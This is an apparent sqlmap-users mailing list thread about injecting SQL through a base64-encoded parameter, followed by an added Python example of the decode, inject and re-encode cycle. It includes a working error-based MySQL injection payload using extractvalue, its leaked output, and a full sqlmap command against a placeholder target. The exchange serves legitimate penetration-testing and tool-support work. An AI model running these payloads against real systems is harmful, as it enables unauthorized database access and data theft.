Just as a note - I had to do data.encode("base64").strip() to remove the newline which the encode adds.
--
Konrads Smelkovs
Applied IT sorcery.

On 3 November 2014 07:29, Konrads Smelkovs <konr...@smelkovs.com> wrote:
> Cheers, works!
>
> --
> Konrads Smelkovs
> Applied IT sorcery.
>
> On 2 November 2014 17:10, Miroslav Stampar <miroslav.stam...@gmail.com> wrote:
>
>> Then please try --eval instead of --tamper.
>>
>> E.g. --eval="param=param.encode('base64')"
>>
>> Bye
>> On Nov 2, 2014 5:42 PM, "Konrads Smelkovs" <konr...@smelkovs.com> wrote:
>>
>>> Miroslav,
>>>
>>> I previously exploited this manually. The injection occurs in the MySQL INSERT statement. If the statement is invalid, we get an error message in HTML comments like so:
>>>
>>> <!--You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''lalalaa))) or'')' at line 1-->
>>>
>>> This is then exploitable using some well-documented methods, such as appending a string like this:
>>> ' or extractvalue(1,concat(0x7e,(SELECT user()))) or'
>>>
>>> which gives us a nice error:
>>> <!--XPATH syntax error: '~root@localhost'-->
>>>
>>> Anyhow, I got halfway there with the following string:
>>> sqlmap -u 'https://target/script.php?data=DATA:User=Test,CC=4512634722348842,CVV=1337' --tamper=base64encode --dbms=mysql -v 3 --proxy=http://localhost:8080
>>>
>>> sqlmap sends correctly encoded test vectors, but it doesn't send the correct initial URL stability check vector:
>>>
>>> 1st request URL: https://target/script.php?data=DATA:User=Test,CC=4512634722348842,CVV=1337
>>> 2nd request URL: https://target/script.php?data=REFUQTpVc2VyPVRlc3QsQ0M9NDUxMjYzNDcyMjM0ODg0MixDVlY9MTMzNy4uIlsnJ1suKSg%3D
>>>
>>> Also, none of the test vectors seem to trigger an error response.
>>>
>>> I tried with --risk=3 to no avail.
>>>
>>> version: 1.0-dev-1ef2c40
>>>
>>> --
>>> Konrads Smelkovs
>>> Applied IT sorcery.
>>>
>>> On 30 October 2014 13:12, Miroslav Stampar <miroslav.stam...@gmail.com> wrote:
>>>
>>>> Hi.
>>>>
>>>> In your case I would do this:
>>>>
>>>> 1) Decode the original base64 value and give it to sqlmap in decoded form (e.g. id=123 instead of the original id=313233)
>>>> 2) Use --tamper=base64encode
>>>>
>>>> Kind regards,
>>>> Miroslav Stampar
>>>>
>>>> On Thu, Oct 30, 2014 at 1:15 PM, Konrads Smelkovs <konr...@smelkovs.com> wrote:
>>>>
>>>>> Hello,
>>>>>
>>>>> I am writing a small modification which would allow tampering with/decoding variables in the request.
>>>>> As I understand it, the parameters are decoded/parsed into a dict after option.py:2323 (parseTargetDirect()), but where can I access the full, parsed dict of the GET/POST/cookie values?
>>>>>
>>>>> (Specifically, I have a base64-encoded string as a parameter, and to insert the payload, the parameter must be base64-decoded, injected and then encoded back.)
>>>>>
>>>>> --
>>>>> Konrads Smelkovs
>>>>> Applied IT sorcery.
>>>>
>>>> --
>>>> Miroslav Stampar
>>>> http://about.me/stamparm
------------------------------------------------------------------------------
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
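The decode/inject/re-encode cycle the thread describes, together with the trailing-newline artefact behind the .strip() note at the top, as an added Python 3 example. This is not code from the thread, from sqlmap or from its base64encode tamper script: tamper() only follows the shape of a sqlmap tamper function, the sample parameter value and payload are constructed to mirror the ones quoted above, and the target URL is not contacted.

```python
import base64
import codecs
from urllib.parse import quote, unquote

# Constructed sample value and payload, mirroring the shape of those in the thread.
CLEAR = "DATA:User=Test,CC=4512634722348842,CVV=1337"
PAYLOAD = "' or extractvalue(1,concat(0x7e,(SELECT user()))) or'"


def tamper(payload, **kwargs):
    """Base64-encode the full parameter value (clear text plus injected payload).

    Same call shape as a sqlmap tamper function, tamper(payload, **kwargs); a real
    tamper script also declares __priority__ and dependencies(), omitted here.
    base64.b64encode never appends a newline, so no .strip() is required.
    """
    if payload is None:
        return payload
    return base64.b64encode(payload.encode("utf-8")).decode("ascii")


def codec_encode(value):
    """The codec route (Python 2 str.encode('base64'), Python 3 codecs.encode on
    bytes) wraps its output every 76 characters and always ends with a newline.
    Sent as-is, that newline becomes part of the parameter the server decodes."""
    return codecs.encode(value.encode("utf-8"), "base64").decode("ascii")


def inject_into_b64(original_b64, payload):
    """Decode the captured base64 parameter, append the payload to the clear
    text, re-encode, then URL-escape so '=', '+' and '/' survive the query string."""
    clear = base64.b64decode(unquote(original_b64)).decode("utf-8")
    return quote(tamper(clear + payload), safe="")


def server_view(sent_value):
    """What the application sees after URL-decoding and base64-decoding."""
    return base64.b64decode(unquote(sent_value)).decode("utf-8")


if __name__ == "__main__":
    captured = quote(tamper(CLEAR), safe="")  # value as a proxy would show it
    sent = inject_into_b64(captured, PAYLOAD)
    print("b64encode :", tamper(CLEAR))
    print("codec     :", repr(codec_encode(CLEAR)))  # note the trailing '\n'
    print("sent      :", sent)
    print("server    :", server_view(sent))
```

Running it shows why the thread's --eval variant needed .strip(): codec_encode() returns the same 60 characters as tamper() followed by a newline, and that newline would otherwise travel inside the parameter. On a Python 3 sqlmap the corresponding --eval snippet would use base64.b64encode (with an explicit import base64; in the snippet, since --eval executes arbitrary Python), which sidesteps the issue entirely; that form is an assumption about the runtime, not something stated in the thread.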